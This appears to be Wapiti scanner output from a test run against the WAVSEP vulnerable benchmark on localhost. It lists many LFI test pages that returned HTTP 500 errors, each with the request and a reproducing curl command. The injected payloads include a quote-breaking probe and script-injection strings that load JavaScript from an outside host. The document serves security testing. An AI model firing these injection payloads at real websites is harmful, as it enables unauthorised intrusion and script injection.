Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2eqrdvi44z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2eqrdvi44z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwefirjsurz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwefirjsurz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwp431nws3sz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwp431nws3sz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw94k0qzqoyz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw94k0qzqoyz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwn7q6wpidwz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwn7q6wpidwz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwd2l2n3k9yz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwd2l2n3k9yz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbiyibewvsz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbiyibewvsz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws3jjo1954z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws3jjo1954z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwlr9n1ddyuz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwlr9n1ddyuz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwa93inz9cfz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwa93inz9cfz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwacccx4z7wz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwacccx4z7wz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi989t8kebz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi989t8kebz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgh1h0mjo6z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgh1h0mjo6z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi4q9bd8xzz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi4q9bd8xzz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwh15uqe769z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwh15uqe769z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwf8awo4k0kz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwf8awo4k0kz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqhjx502qfz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqhjx502qfz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxw2frnjsbz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxw2frnjsbz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwboyi4qx6fz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwboyi4qx6fz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

